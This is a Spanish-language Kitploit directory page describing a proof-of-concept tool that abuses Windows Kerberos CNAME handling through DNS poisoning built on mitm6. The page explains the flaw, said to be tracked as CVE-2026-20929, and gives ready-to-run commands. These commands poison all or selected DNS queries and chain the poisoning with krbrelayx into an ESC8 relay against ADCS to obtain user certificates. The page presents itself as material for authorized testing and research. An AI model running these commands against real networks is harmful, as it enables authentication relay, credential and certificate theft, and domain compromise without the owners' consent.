Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
MITM6-Kerberos-CNAME-Abuse — PoC de abuso de CNAME en Kerberos | Kitploit
Herramientas/GitHubGitHub/benzamir/mitm6-kerberos-cname-abuse
ExplotaciónMovimiento LateralExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAutenticaciónRed TeamingAnálisis de DNS

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
benzamir/mitm6-kerberos-cname-abuse

MITM6-Kerberos-CNAME-Abuse

PoC de abuso de CNAME en Kerberos

Ver Repositorio
10820hace 6 mesesRevisado por Kitploit

Relay de Autenticación Kerberos - Técnica de Abuso de CNAME (PoC)

Antecedentes

Esta herramienta es la prueba de concepto de la técnica de Relay por Abuso de CNAME de Kerberos, basada en la herramienta MITM6.

La investigación descubrió una falla en el comportamiento del cliente Kerberos de Windows: cuando se devuelve un registro CNAME de DNS, el cliente sigue el alias y construye la solicitud TGS utilizando el nombre de host del CNAME como SPN. Esto permite a un atacante con posición MITM de DNS coaccionar a cualquier usuario de dominio para que solicite un ticket Kerberos para un servicio elegido por el atacante, permitiendo ataques de relay bajo demanda y entre protocolos contra SMB, HTTP y otros servicios donde no se aplica la firma o el enlace de canal (Channel Binding).

A diferencia de técnicas de relay Kerberos anteriores que se limitaban a cuentas de máquina o requerían condiciones específicas, este método funciona de manera confiable contra cuentas de usuario en configuraciones predeterminadas de Windows.

Microsoft mitigó el riesgo aplicando un parche para imponer CBT en https y habilitar la firma por defecto en los protocolos afectados. La corrección se rastrea como CVE-2026-20929.

Para obtener detalles técnicos completos, un recorrido de explotación y un análisis de impacto, consulte la entrada de blog en Cymulate.

Funciones de Abuso de CNAME Añadidas

Envenenamiento de CNAME

Utilice --cname-source para apuntar a un dominio específico que la víctima intenta acceder, o --cname-source-all para envenenar cada consulta DNS. Ambos requieren --cname para especificar el nombre de host objetivo que se utilizará en la respuesta CNAME (la víctima solicitará entonces un TGS para este nombre de host).

Modo Solo DNS

La bandera --only-dns deshabilita la funcionalidad original del servidor DHCPv6 de mitm6 y los Anuncios de Enrutador (Router Advertisement). Esto permite combinar el envenenamiento de CNAME con otras técnicas MITM como el envenenamiento ARP.

Passthrough

La opción --passthrough acepta un archivo que contiene dominios que deben resolverse a sus direcciones IP reales (formato: dominio:ip por línea). Útil para mantener la conectividad con infraestructura crítica como Controladores de Dominio (experimental).

Instalación

root@kitploit:~
pip install -r requirements.txt

Uso

Envenenamiento de CNAME (Todos los Dominios)

Envenena todas las consultas DNS con un CNAME que apunte al objetivo del relay:

root@kitploit:~
python mitm6-cname.py -i eth0 -d corp.local --cname-source-all --cname target.corp.local

Envenenamiento de CNAME (Dominio Específico)

Solo envenena consultas para un nombre de host específico:

root@kitploit:~
python mitm6-cname.py -i eth0 -d corp.local --cname-source fileserver.corp.local --cname adcs.corp.local

Modo Solo DNS

Omite DHCPv6/RA al usar envenenamiento ARP para MITM de DNS:

root@kitploit:~
python mitm6-cname.py -i eth0 --only-dns -d corp.local --cname-source-all --cname target.corp.local

Ejemplo: Ataque ESC8

root@kitploit:~
# Terminal 1: Envenenamiento de CNAME
python mitm6-cname.py -i eth0 -d corp.local --cname-source-all --cname adcs.corp.local

# Terminal 2: Relay a ADCS
krbrelayx.py -t http://adcs.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template User

Créditos

  • mitm6 original: Dirk-jan Mollema

Probado En

  • Windows 10, 11
  • Windows Server 2022, 2025

Requisitos

  • Python 3.x
  • Sistema Operativo Linux

Descargo de responsabilidad

Esta herramienta es una PoC no productiva proporcionada únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsela bajo su propio riesgo y solo contra sistemas para los que tenga permiso explícito de prueba.

Licencia

MIT

Descargar herramienta